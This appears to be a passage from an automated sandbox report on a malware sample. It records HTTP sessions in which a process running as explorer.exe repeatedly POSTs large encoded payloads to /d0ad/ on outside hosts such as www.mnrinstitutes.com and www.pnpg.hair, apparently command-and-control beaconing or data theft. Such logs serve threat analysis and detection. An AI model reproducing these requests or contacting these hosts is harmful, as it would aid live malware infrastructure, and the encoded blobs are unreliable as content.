5a 75 54 78 52 4d 4b 66 61 6a 78 58 4b 49 37 6c 51 34 32 42 4c 7a 4b 59 36 53 65 53 54 63 6f 34 4d 6d 52 50 68 35 36 72 65 64 57 49 69 64 4e 72 71 39 58 7a 32 6f 73 76 68 77 34 66 67 36 53 54 4a 61 4a 76 39 61 74 4d 70 47 45 6a 34 39 38 51 30 41 53 7a 67 4d 67 72 76 44 35 4c 38 48 39 36 4b 36 69 6a 6a 50 52 39 32 4f 31 33 37 56 2d 58 69 36 7a 4c 68 7a 75 4a 57 56 31 52 66 7e 77 75 4a 72 57 7a 65 52 4a 51 64 49 69 4b 63 43 51 74 72 36 66 36 46 77 75 50 70 7e 5a 36 37 7a 46 4b 6c 4e 4b 30 79 4e 4e 54 44 50 64 7e 73 31 53 42 2d 61 34 77 6c 62 6e 62 33 44 4b 4d 78 42 4b 57 6e 43 56 7e 69 28 75 31 76 49 59 63 66 75 67 6e 55 79 6c 65 31 49 76 30 72 48 59 53 5f 35 64 74 5f 75 76 6d 52 65 2d 41 43 71 30 55 53 66 36 31 53 63 4b 67 71 70 7a 28 48 63 74 63 59 50 71 76 64 74 30 47 67 69 64 77 42 32 47 70 59 53 4c 44 79 36 69 7a 72 49 49 4f 53 30 55 66 72 4e 69 4e 76 37 71 7e 57 32 62 55 79 78 39 4b 2d 4c 69 42 4a 4a 58 71 44 56 65 6f 70 66 4a 70 33 45 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=BRVbfBpwxuQVhfZWK7MIWuuJimzhZ-VT2UHj~-niuDP9pgwmFvUVpWRTlyJuvNIUIRs1otgn06G45FSpK96BoYt1lnv05oIYLeaeg1NCvg~ddL(bwQbFN_s-swsGrYjPVw3kOOX2eHyxqxOzOKr9Na4o1yCAWjwVTpSSD0OT0PBP53DKgGrbiQNRAZzbkMnjKVZr9YGd1ZuTxRMKfajxXKI7lQ42BLzKY6SeSTco4MmRPh56redWIidNrq9Xz2osvhw4fg6STJaJv9atMpGEj498Q0ASzgMgrvD5L8H96K6ijjPR92O137V-Xi6zLhzuJWV1Rf~wuJrWzeRJQdIiKcCQtr6f6FwuPp~Z67zFKlNK0yNNTDPd~s1SB-a4wlbnb3DKMxBKWnCV~i(u1vIYcfugnUyle1Iv0rHYS_5dt_uvmRe-ACq0USf61ScKgqpz(HctcYPqvdt0GgidwB2GpYSLDy6izrIIOS0UfrNiNv7q~W2bUyx9K-LiBJJXqDVeopfJp3E.
Oct 26, 2022 13:17:39.794884920 CEST	1011	IN	HTTP/1.1 200 OK Date: Wed, 26 Oct 2022 11:17:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DPeFxptLYVdwfdYxq%2BTqapk02eAEMw2iL1IeNS0IPtlXqzhtnOUw7GK%2FBqFQt5t2AG1K06Um2Fd%2BiJpn29WRa0Ex7uWk8iTkqsDqnn0U9%2Fn5%2Fqvorzc5k046IiFiYO5b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7602c96a6d729b77-FRA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 36 30 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 58 5b 8f eb b6 11 7e 3f c0 f9 0f ac 83 26 7b 8a 91 2c f9 7e 64 7b 9b a2 49 d0 3e b5 68 fb d2 a7 80 12 47 12 b3 bc 2d 49 f9 d2 c5 fe f7 80 b2 94 63 af b5 de 3d a9 0d 98 12 39 1c ce 7c f3 cd 90 f4 c7 0f 9b 3f fc f0 8f bf fe e7 bf ff fc 91 d4 5e 8a fb 8f 1f 36 5d 1b 9e 90 b2 fb 8f 1f 08 21 64 e3 b9 17 78 bf df ef 63 a3 4c 15 d7 94 5b c2 1d a1 a4 68 9c d7 92 b8 5a 5b 4f 98 96 94 ab cd f8 24 dd 4d 95 e8 29 51 54 e2 76 b4 e3 b8 37 da fa 11 29 b4 f2 a8 fc 76 b4 e7 cc d7 5b 86 3b 5e 60 d4 be 00 e1 8a 7b 4e 45 e4 0a 2a 70 9b 8e c8 b8 d7 25 b8 7a 20 16 c5 76 64 2c 16 5a 29 2c fc 88 d4 16 cb ed a8 f6 de b8 6c 3c 2e b5 f2 2e ae 9c a7 9e 17 71 a1 e5 e8 62 f6 a0 b0 d6 95 40 6a b8 0b f2 e3 c2 b9 c9 9f 4b 2a b9 38 6e ff c6 15 cb f6 55 ed bf 9f 25 c9 7a 9e 24 df 32 ee 8c a0 c7 ad db 53 33 3a 19 e3 fc 51 a0 ab 11 fd 6f 6b b5 5d c4 1f 0d 6e 47 1e 0f 3e 28 ed 07 fb 4f 80 1a 72 cd 8e c0 f8 0e 9c a1 0a a8 31 02 3d e8 fc 17 2c 3c f0 d2 52 89 50 a7 50 4f a0 9e 42 3d 83 7a 0e f5 02 0c e4 42 17 0f 8f 8d f6 08 c6 22 50 a0 79 6e 81 16 56 ab a3 04 ca 98 45 e7 20 e7 15 14 dc 23 14 9a 21 30 14 c0 4a 05 28 81 cb 0a b8 72 f0 90 33 78 04 07 8e 4a 03 4e 52 21 c0 79 cb 1f 30 34 5a 55 e0 9a 1c 5c 63 c0 7b d8 51 0b 39 34 c0 a1 40 e5 d1 02 13 c0 3c 30 06 5a 40 23 40 70 28 39 0a e6 d0 43 a9 ad 04 41 73 14 20 b0 42 c5 c0 d3 5c 20 14 d4 78 ae 15 f8 d6 6d 5f 6a ed c1 07 a2 81 b7 e0 6b f0 0c a8 f5 bc 10 08 d4 71 16 26 a8 1d 75 c0 d0 53 2e 1c a0 cc 91 41 c9 ab c6 62 68 7a 7d 41 11 5a 08 9a 42 53 59 dd 18 90 a8 1a 50 74 07 ba f1 a6 f1 60 9b fc 08 0e 8b 76 86 6b a4 a4 Data Ascii: 606X[~?&{,~d{I>hG-Ic=9\|?^6]!dxcL[hZ[O$M)QTv7)v[;^`{NEp%z vd,Z),l<..qb@jK8nU%z$2S3:Qok]nG>(Or1=,<RPPOB=zB"PynVE #!0J(r3xJNR!y04ZU\c{Q94@<0Z@#@p(9CAs B\ xm_jkq&uS.Abhz}AZBSYPt`vk
Oct 26, 2022 13:17:39.794959068 CEST	1012	IN	Data Raw: f6 08 9e 4b 04 49 ed 03 d0 86 71 0d 3b ce 50 3f 49 6a 2b ae b2 64 6d 28 63 5c 55 59 b2 ce b5 65 68 b3 64 1d 38 13 39 fe 3f cc d2 24 f9 63 fb 9a 71 55 a3 e5 7e bd c3 60 3d 15 11 15 bc 52 59 4e 1d 0a ae f0 f9 d2 a9 de 9b 73 07 3a 97 6e fa d1 d9 fe Data Ascii: KIq;P?Ij+dm(c\UYehd89?$cqU~`=RYNs:nQ0kI\|D5YIp8@c-+ey<u<u}luq~:ZjfCb-ZX/RO2E!>4fj@GYR*]:1 i~^~Nw{ >Z;c`(b
Oct 26, 2022 13:17:39.795003891 CEST	1012	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49848	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:15:42.458986044 CEST	334	OUT	POST /d0ad/ HTTP/1.1 Host: www.mnrinstitutes.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.mnrinstitutes.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.mnrinstitutes.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 75 68 68 39 36 75 64 7a 67 69 68 70 36 53 78 70 63 54 41 54 52 72 4b 69 57 67 36 30 55 51 54 33 51 79 57 6b 4b 45 68 38 52 70 66 38 4a 74 6c 6b 52 4b 76 43 30 4c 77 2d 41 72 49 34 70 77 53 49 38 34 61 68 75 64 35 43 78 31 78 78 71 61 76 6e 4a 6f 44 31 71 6a 69 65 77 46 36 68 69 76 35 65 63 53 4f 54 4f 33 6f 34 67 6c 42 54 42 79 44 50 55 71 4e 53 56 6e 42 62 42 4c 5a 48 31 7a 31 67 6e 52 63 64 79 74 28 6e 51 68 6f 65 55 2d 73 73 44 43 55 51 65 56 38 6f 4a 61 7e 6b 46 38 54 6d 77 34 32 46 59 76 75 34 32 33 43 52 6b 64 4e 32 38 70 46 47 28 4e 51 52 33 30 31 6e 6a 6c 33 64 39 6f 35 46 51 35 28 38 53 5f 39 66 6a 37 79 6e 79 68 66 4a 51 77 67 53 6f 34 38 7a 4a 37 4d 4f 52 66 79 65 71 4e 36 32 5a 66 51 6e 4c 49 6e 58 68 31 33 57 34 4d 33 55 62 5a 5a 4b 4e 47 6f 6d 51 67 52 31 35 72 6a 75 37 48 70 5f 59 66 7a 66 4d 6d 56 4c 35 5f 31 50 69 4e 34 33 49 44 59 61 49 63 51 57 33 6e 42 47 73 78 77 30 43 30 53 7a 67 64 78 36 32 4a 48 67 36 34 7e 35 6e 4f 39 38 64 51 77 31 43 53 6b 31 48 38 59 4f 65 51 74 51 44 58 55 6e 53 43 53 35 64 6d 6f 2d 33 41 7a 76 59 34 4f 5a 59 35 34 56 6c 77 63 6a 56 58 6b 57 64 55 7a 4f 58 4c 47 67 54 71 65 62 37 71 70 32 75 62 66 63 77 59 79 37 58 52 6f 45 45 59 54 6b 69 33 31 36 55 42 56 34 4c 42 47 6d 77 6b 42 44 73 70 41 39 68 6f 57 38 70 56 46 42 46 67 46 62 56 6e 4f 66 4a 75 7a 33 7a 5a 36 78 30 48 41 6d 75 72 68 50 42 2d 6c 6c 68 6a 72 5a 7e 4f 48 63 4e 33 66 38 52 53 75 32 38 6b 43 62 6c 57 4b 69 6d 31 70 4f 79 4a 45 67 55 46 47 39 78 2d 36 53 59 32 63 6b 37 59 30 57 6f 6c 56 75 4a 4f 65 74 6e 79 54 37 4f 7a 67 34 38 56 75 79 64 73 30 66 56 5f 51 55 70 62 61 6f 46 77 77 6b 5a 70 42 6a 6a 32 31 6d 43 49 44 2d 49 68 4f 4b 50 50 51 5f 54 65 41 42 72 62 4e 75 62 36 46 33 30 56 34 2d 59 5a 61 72 6e 50 59 32 43 2d 4a 5f 49 48 5a 76 56 6e 58 54 53 79 6f 70 7e 51 4d 79 73 72 77 5f 48 61 48 48 33 72 48 5f 6f 61 32 57 37 6b 6f 70 6b 72 58 34 30 57 4c 6c 43 69 39 75 67 47 33 63 47 57 47 52 37 73 31 54 61 54 52 43 68 4b 34 48 6f 4e 4f 6f 46 64 36 6c 66 33 7e 78 28 32 34 41 74 58 4c 35 34 41 6b 4e 56 59 69 53 51 65 41 46 77 64 28 6d 78 63 38 65 6a 52 53 69 4d 4c 30 76 76 63 33 38 79 77 79 76 55 6f 56 5a 48 67 4b 78 66 6f 39 75 6c 4e 79 57 5a 64 43 50 4c 71 41 4b 6e 33 71 64 70 41 6f 2d 69 6c 57 47 36 46 7e 56 65 63 7e 51 76 6a 44 6e 64 72 4b 30 46 56 58 31 6e 6d 48 7a 74 72 63 42 41 58 57 31 71 75 6f 67 4f 4c 4a 77 4a 56 6d 32 6b 76 46 4a 76 47 47 61 31 47 33 4b 71 39 39 67 53 65 50 58 4f 49 56 62 39 49 35 63 57 74 59 43 7a 5a 49 78 34 53 61 4f 56 5f 53 4c 4c 4f 33 39 47 72 37 32 50 70 55 4e 7a 68 69 4d 57 41 5a 56 4a 78 49 62 48 6c 39 72 74 67 49 42 44 38 4a 37 72 Data Ascii: jXu=uhh96udzgihp6SxpcTATRrKiWg60UQT3QyWkKEh8Rpf8JtlkRKvC0Lw-ArI4pwSI84ahud5Cx1xxqavnJoD1qjiewF6hiv5ecSOTO3o4glBTByDPUqNSVnBbBLZH1z1gnRcdyt(nQhoeU-ssDCUQeV8oJa~kF8Tmw42FYvu423CRkdN28pFG(NQR301njl3d9o5FQ5(8S_9fj7ynyhfJQwgSo48zJ7MORfyeqN62ZfQnLInXh13W4M3UbZZKNGomQgR15rju7Hp_YfzfMmVL5_1PiN43IDYaIcQW3nBGsxw0C0Szgdx62JHg64~5nO98dQw1CSk1H8YOeQtQDXUnSCS5dmo-3AzvY4OZY54VlwcjVXkWdUzOXLGgTqeb7qp2ubfcwYy7XRoEEYTki316UBV4LBGmwkBDspA9hoW8pVFBFgFbVnOfJuz3zZ6x0HAmurhPB-llhjrZ~OHcN3f8RSu28kCblWKim1pOyJEgUFG9x-6SY2ck7Y0WolVuJOetnyT7Ozg48Vuyds0fV_QUpbaoFwwkZpBjj21mCID-IhOKPPQ_TeABrbNub6F30V4-YZarnPY2C-J_IHZvVnXTSyop~QMysrw_HaHH3rH_oa2W7kopkrX40WLlCi9ugG3cGWGR7s1TaTRChK4HoNOoFd6lf3~x(24AtXL54AkNVYiSQeAFwd(mxc8ejRSiML0vvc38ywyvUoVZHgKxfo9ulNyWZdCPLqAKn3qdpAo-ilWG6F~Vec~QvjDndrK0FVX1nmHztrcBAXW1quogOLJwJVm2kvFJvGGa1G3Kq99gSePXOIVb9I5cWtYCzZIx4SaOV_SLLO39Gr72PpUNzhiMWAZVJxIbHl9rtgIBD8J7r
Oct 26, 2022 13:15:42.459036112 CEST	337	OUT	Data Raw: 4d 36 4a 67 4a 67 4c 45 41 64 4f 76 2d 6e 41 63 74 33 77 65 78 7e 34 6e 2d 6b 65 73 4a 44 44 48 4a 43 31 38 57 34 6f 59 62 79 52 75 78 34 58 65 79 45 46 78 6f 30 30 57 41 49 76 5a 4a 4a 74 61 6a 6e 6f 6c 75 44 31 77 39 70 4c 54 4b 28 34 43 74 55 Data Ascii: M6JgJgLEAdOv-nAct3wex~4n-kesJDDHJC18W4oYbyRux4XeyEFxo00WAIvZJJtajnoluD1w9pLTK(4CtU3z4v4slSAIMDmw9DxvQjjs3r5YltIRtfyRHcCqwyvW99MDGH_wJ73ThqPN6ZbtnN5(GuqhFsf1mdlptNabVRp1iExeRsAOiSe9W40nY1N5kto2AKGzwb7tNDZFXBeV1lJQ9kJXvJg0luavZeXvy97yheNb4bnTJ3l
Oct 26, 2022 13:15:42.459086895 CEST	345	OUT	Data Raw: 31 35 6d 68 48 7a 6c 4c 76 6b 68 72 31 33 31 4e 34 52 31 6a 6a 44 63 7e 45 68 36 48 67 6e 75 54 48 31 5a 61 6b 4c 70 33 2d 4f 59 76 47 59 56 6a 53 63 75 66 6f 4b 37 6f 56 6e 76 73 75 33 42 43 65 4d 41 44 4b 4c 44 42 5a 48 75 28 52 48 62 44 48 77 Data Ascii: 15mhHzlLvkhr131N4R1jjDc~Eh6HgnuTH1ZakLp3-OYvGYVjScufoK7oVnvsu3BCeMADKLDBZHu(RHbDHwyFSMaa9A_kEqACpeHhhROi_1dn02vn0IrVuxwMWeRdOriGjS9aDLmcFMxjz2IJCh4lquUbwRY(51P~D75IXoHWAXCVFDsPp8kR39qO0kH2eCisN(EI0DxwZsiz2~yQx5Pe_PG0LbEx1ZnTsr0VOO5wR~4LysI~F0y
Oct 26, 2022 13:15:42.487982988 CEST	345	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:15:42 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Oct 26, 2022 13:15:42.488162994 CEST	348	OUT	Data Raw: 65 65 68 47 32 67 44 35 46 54 4a 47 50 6e 30 39 66 31 6a 38 43 6a 78 64 75 61 73 76 6f 65 52 5a 79 6e 6f 58 75 6a 6c 36 75 7e 37 35 4c 32 68 48 35 58 6c 4f 68 72 65 37 46 28 62 4e 56 55 64 47 4b 30 4f 6e 43 44 6b 6c 61 78 73 51 73 62 5f 75 39 47 Data Ascii: eehG2gD5FTJGPn09f1j8CjxduasvoeRZynoXujl6u~75L2hH5XlOhre7F(bNVUdGK0OnCDklaxsQsb_u9GGCv~kWXJeku4ixnKUrbYl9Nhy9rcOPIBXRLqNgmio2Cy0Pmobue6foNEfZNwRQ7BqmnkzC_0EHEZ9b2b5h3jVhIOb1LBQaxd1QeaJVrmuiAmCJatxlH7c(c(_Q45XNAEAlD~nlJj219~wtsSzKTyEOc~7sZv7nUT3
Oct 26, 2022 13:15:42.488440037 CEST	353	OUT	Data Raw: 6c 35 2d 6a 69 45 55 6c 46 76 58 43 42 58 56 48 73 49 50 4c 4a 5a 35 78 59 56 71 77 77 76 63 71 37 65 75 54 54 58 39 7e 64 6f 58 72 4a 54 4e 57 64 4b 35 33 52 51 59 51 30 32 34 67 6d 62 47 47 6b 6e 53 36 47 7e 53 6e 64 4b 6d 56 4b 57 54 32 43 63 Data Ascii: l5-jiEUlFvXCBXVHsIPLJZ5xYVqwwvcq7euTTX9~doXrJTNWdK53RQYQ024gmbGGknS6G~SndKmVKWT2CcizCdebq2kUteoKsNpVg2TdXq8sVRI3CzaMFah6SJpaYGQiX1WmJY0i0ouTmVpwsgV3mfgWm6Dnosl(cMxgIl8~5ablAV8YUEFU_wYB1nOsihPF2gU5xRqdu5V8fwCjpw5O436EpXGh8VwDWT-(l4W5zRQQ1GEh6bq
Oct 26, 2022 13:15:42.488609076 CEST	360	OUT	Data Raw: 58 59 45 48 33 34 4d 36 76 46 5f 66 53 75 71 38 5f 6b 54 71 57 47 36 34 4c 4a 73 69 66 5a 75 6d 46 31 4c 6f 41 4d 45 6f 68 64 51 4f 30 30 63 61 47 6a 74 6f 59 64 6f 63 47 6b 54 55 54 7a 31 6b 4a 71 43 61 73 30 53 36 70 73 30 57 51 50 4c 57 59 43 Data Ascii: XYEH34M6vF_fSuq8_kTqWG64LJsifZumF1LoAMEohdQO00caGjtoYdocGkTUTz1kJqCas0S6ps0WQPLWYCiVF5AODwbhuZTwQN85_MVGbyHK1CcD3xlWyfx2zHPiea1U86Hp8~gppGWIQe0KZc1lexslRKu6wzwO0q1KWB2DddSx_0K5KZ37MfeXamdB5Cju0lYTgxQRBsgNoRVUR~_h7QvP7ceifAElxJS~T~cYA4XZqgukf0B
Oct 26, 2022 13:15:42.488656044 CEST	363	OUT	Data Raw: 47 48 75 54 66 76 5f 78 46 5a 35 5a 7a 6f 78 61 42 76 74 7a 6f 64 50 46 38 4d 6a 56 51 64 30 6f 61 7a 54 4d 65 39 4c 46 4f 57 37 33 4e 70 4c 73 44 6f 45 36 58 34 4e 50 57 73 77 4d 77 44 6e 45 34 4d 53 4e 5a 55 48 4a 2d 52 44 35 6c 39 7a 4c 79 43 Data Ascii: GHuTfv_xFZ5ZzoxaBvtzodPF8MjVQd0oazTMe9LFOW73NpLsDoE6X4NPWswMwDnE4MSNZUHJ-RD5l9zLyCQCIRNdEBRlXWUwilL0AZQMhwcZjGpvsv9CRf6iKTIu7tg0rZ7h2BQMjkcS3QYRjuued5z4OHA5SDmDt2Cwbc4pOCktd6aKpd0N4GKK6kIntEzVqABcpwQ91ByyLpyzwCcAuLE0ZRpvX8-lKIUb9wSIU~F1xseezeD
Oct 26, 2022 13:15:42.488826990 CEST	365	OUT	Data Raw: 6c 71 79 46 57 53 69 61 63 6c 38 36 79 77 58 72 4e 47 35 35 4a 72 6c 6f 45 33 6d 31 31 30 75 30 33 44 41 6f 4d 67 76 69 75 58 6c 74 52 6e 51 70 4d 45 73 7a 65 30 61 54 4b 31 5f 58 6e 5a 2d 30 45 62 32 4f 62 45 53 6e 67 55 48 69 67 56 4b 72 43 66 Data Ascii: lqyFWSiacl86ywXrNG55JrloE3m110u03DAoMgviuXltRnQpMEsze0aTK1_XnZ-0Eb2ObESngUHigVKrCf5FxUJ0p9yGxFW2BGbRPJlPCq3JBDmdFInUPCECItFr1jvofn-TvNOn11WoGrPFe94NfO9RcZb6vNtrInwSB6E(flc2sFBVfSwxpAJHnaz2ho-PklaEHRCGCprQxpYsN2SVC(-JODKfnjDwWXqa5GIQqPBF2JYfFR9
Oct 26, 2022 13:15:42.488997936 CEST	369	OUT	Data Raw: 59 28 62 39 36 46 75 51 35 77 39 6a 45 61 49 47 64 58 37 36 43 7e 4c 74 45 34 76 73 5f 43 74 6f 72 64 70 37 4f 43 79 4b 4d 54 62 33 46 43 59 6a 6c 74 45 68 54 35 4e 46 65 45 51 56 75 71 78 65 74 64 58 30 4c 69 63 34 39 66 41 5a 30 69 54 50 49 5a Data Ascii: Y(b96FuQ5w9jEaIGdX76C~LtE4vs_Ctordp7OCyKMTb3FCYjltEhT5NFeEQVuqxetdX0Lic49fAZ0iTPIZzAa5QcDzm7sGmPDlJLMAc5wxgxw7ay5SC0k(KE8hRnPHO7Mqb018w1PUlYRfFWbCrP8V9m7PGbIfuOdztznDXSMYLnjx7tfk8C-ltSevzgqoH8eTeF9vr4ONDmZEJeRJJLijmTThI6-PqX_H6xvdDXSr7eYCRbv4t
Oct 26, 2022 13:15:42.517168999 CEST	370	OUT	Data Raw: 4d 6a 6b 4d 66 6e 65 52 71 46 30 72 72 38 4e 52 4b 42 37 53 64 39 2d 74 64 45 48 64 52 45 67 77 6c 43 75 68 78 4f 42 79 62 71 75 66 37 34 5a 73 75 49 37 36 52 4c 56 75 38 59 66 54 6e 36 54 43 48 6e 5a 39 6e 56 70 4b 46 55 4b 58 45 5a 41 4e 51 44 Data Ascii: MjkMfneRqF0rr8NRKB7Sd9-tdEHdREgwlCuhxOBybquf74ZsuI76RLVu8YfTn6TCHnZ9nVpKFUKXEZANQDQXuidR_PmDc3MVT90Xn89RWHJlLCfJzCUfBQQtnmWkjMM0q(RHzGam2PgB-rXMvfOio(JULSP(bTRX6vGMjJK7q3yZFfMS-0Xihjn7yzCiNEvHJPj(mxoXdeWW_CsaLNeFRZISqA3ldTlFUzQqkbkgeGbXO1RMiuG
Oct 26, 2022 13:15:42.517219067 CEST	374	OUT	Data Raw: 70 35 48 4b 67 62 44 4f 4e 6f 66 68 42 67 39 51 49 7a 36 64 4e 4e 44 6a 35 30 66 71 2d 70 37 61 76 6d 57 68 4a 48 72 66 76 39 67 75 51 7e 6d 53 54 69 61 66 66 31 44 6c 6f 30 63 73 79 62 30 4b 71 34 45 4c 44 6e 44 49 38 47 73 4b 69 6c 59 72 4b 78 Data Ascii: p5HKgbDONofhBg9QIz6dNNDj50fq-p7avmWhJHrfv9guQ~mSTiaff1Dlo0csyb0Kq4ELDnDI8GsKilYrKxopKu5NNQJ5zuPUOH2Iwx-JK6t0mhxyfWKHufEGd(azZgJSpHiR_uE~nuvkQnA~TAQPCRDyBEjUf6Vt6dYSikRGMC81PUGmQDfmFsfO8Pethp-D4l94mSJca0P2KvviQ3NfELK3rr736Slu5N8q59bBe3v0AyNC8ip

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.11.20	49884	188.114.96.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:41.616065979 CEST	1019	OUT	POST /d0ad/ HTTP/1.1 Host: www.pnpg.hair Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.pnpg.hair User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.pnpg.hair/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 42 52 56 62 66 42 70 77 78 75 51 56 68 66 5a 57 4b 37 4d 49 57 75 75 4a 69 6d 7a 68 5a 2d 56 54 32 55 48 6a 7e 2d 6e 69 75 44 48 39 70 57 45 6d 43 38 38 56 76 6d 52 54 73 53 4a 76 76 4e 49 56 49 52 6b 78 6f 74 38 4e 30 38 43 34 35 79 57 70 4b 4c 75 42 36 49 74 30 71 48 76 32 75 34 49 4d 4c 65 57 4b 67 31 5a 53 75 55 32 64 63 4d 44 62 30 68 62 45 4d 76 73 43 73 77 73 61 76 59 6a 70 56 32 72 4f 4f 4f 4c 32 65 46 47 78 34 30 53 7a 4a 64 48 39 41 71 34 72 37 53 44 52 50 7a 78 72 54 70 58 68 44 30 4f 74 30 4f 46 50 35 33 6a 4b 68 46 54 55 6a 77 4e 52 66 70 7a 55 67 4d 71 71 4b 56 46 7a 39 59 43 64 31 62 75 54 77 78 4d 4b 4e 4c 6a 79 51 71 49 39 76 77 34 62 4d 72 28 38 59 36 33 70 53 58 45 6f 35 5f 61 52 64 43 52 36 70 5f 64 57 55 53 64 50 32 36 39 69 39 57 70 39 76 69 5a 70 66 6a 79 6b 54 4b 57 4a 67 35 43 74 61 37 75 46 6e 59 38 31 4f 45 41 39 7e 46 55 46 72 76 7a 6c 4c 38 48 74 36 4c 4f 69 6a 54 28 52 38 30 71 36 78 72 56 39 4d 53 37 78 65 52 28 67 4a 53 4e 39 52 66 32 67 75 4c 48 57 79 2d 52 4a 43 74 30 68 45 73 44 59 77 62 37 59 33 6c 78 30 50 70 79 37 36 35 65 6e 66 47 5a 4b 79 43 39 4e 5a 7a 50 61 34 4d 31 73 59 75 61 45 30 6c 62 6e 62 33 66 30 4d 78 46 4b 56 53 75 56 7e 51 6e 75 6b 6f 55 59 62 76 76 72 6e 55 7a 37 65 31 30 4d 30 6f 6e 36 53 5f 4a 37 74 39 69 76 6e 41 4f 2d 44 44 71 33 52 69 66 5f 34 79 63 64 6b 72 55 70 28 48 41 6c 63 59 65 58 76 4b 39 30 49 41 79 64 30 42 32 46 73 34 53 4d 45 79 36 30 6c 72 45 69 4f 53 42 70 66 72 70 79 4e 70 28 71 28 54 66 74 4f 77 78 45 58 73 62 78 41 2d 74 6a 71 79 41 58 38 5a 76 65 77 67 75 6c 42 41 71 4a 52 62 7e 76 64 4d 35 70 74 33 77 73 49 76 72 46 42 73 67 5f 79 45 62 43 71 69 45 53 54 54 4b 74 41 6d 6e 76 69 6e 65 4d 6b 7a 76 45 31 4a 46 43 66 76 63 6b 78 68 4b 75 31 6a 4d 63 78 50 6e 7a 63 6c 53 6f 69 51 28 57 7a 74 35 46 47 55 63 4b 4c 72 28 33 48 6e 75 59 30 51 74 30 7a 47 77 2d 75 39 64 64 79 6c 32 51 50 6c 57 38 28 2d 71 4d 41 49 6a 7a 7e 72 77 36 36 53 4b 6b 75 72 31 6b 4f 59 35 78 52 66 4b 65 4d 56 69 5f 46 53 73 47 71 6e 7a 69 54 37 38 7a 39 31 56 32 37 41 6b 32 4e 4b 33 5a 5a 39 42 49 4d 45 41 4b 34 42 77 62 72 6d 5a 56 36 62 54 52 37 66 57 56 6f 53 4c 7a 31 4a 35 41 5a 4a 42 4e 61 58 4f 71 7a 73 48 4d 4b 72 62 74 4d 69 32 6e 30 31 6f 45 6a 74 63 76 75 41 42 50 4e 36 35 4e 51 79 45 6f 4b 44 4c 72 6e 51 4e 30 28 73 31 56 30 74 39 59 59 4b 55 65 32 64 70 59 79 46 4d 55 44 72 30 36 55 4b 54 38 6b 34 7e 6c 6e 43 6b 5f 5a 46 71 6c 77 68 37 65 58 75 32 38 6e 55 78 37 66 2d 4b 7a 79 57 53 6f 56 5a 6c 6e 6d 5f 45 4f 39 45 44 66 5a 47 36 71 4c 79 52 55 34 4a 34 69 7a 38 38 4b 6f 36 28 4c 63 35 33 72 49 72 68 71 70 75 71 43 6f 73 6a 39 6d 54 47 35 6a 43 6d 4b 72 61 50 49 72 38 44 6e 58 65 31 58 65 68 34 46 76 56 6a 45 62 36 35 72 4e 66 45 4a 32 79 59 6e 47 4c 33 46 68 32 52 34 4d 6f 70 6b 61 4d 36 4a 4f 57 57 39 6c 42 35 30 6b 4e 4a 62 56 57 76 76 39 54 75 65 28 72 77 35 7a 41 72 48 28 37 6f 43 61 67 61 68 69 38 39 43 67 38 49 6e 68 63 68 42 35 49 65 73 49 31 44 4a 74 6d 42 4c 55 34 41 32 74 46 71 54 4f 71 57 76 75 78 6a 49 28 4f 72 61 70 72 28 43 63 55 75 58 51 6d 4b 71 42 54 6a 67 77 6b 33 67 51 72 4f 48 51 38 37 51 36 62 4e 78 64 4a 63 63 75 48 59 38 6e 6f 56 4d 37 5f 4f 79 4c 4b 52 44 28 50 37 47 78 5f 54 5f 38 4c 39 35 72 4c 6e 37 52 58 49 63 52 30 74 37 45 6a 76 6e 4c 59 50 4e 43 4a 62 57 48 54 7a 37 6b 6d 36 6d 70 42 37 41 73 31 65 2d 49 66 56 37 7e 70 43 54 57 39 69 79 35 70 61 41 48 54 69 50 58 55 71 62 6e 75 45 57 38 55 78 6d 56 30 4a 77 4b 4a 63 71 43 6a 59 5a 46 6d 64 4e 49 68 48 33 66 71 38 78 71 6f 79 6d 6b 70 6f 34 6e 47 64 44 47 2d 6b 4c 49 4b 58 36 49 6d 61 6b 54 76 75 4c 72 33 62 6c 76 4f 42 47 30 63 6b 54 72 78 7e 51 73 49 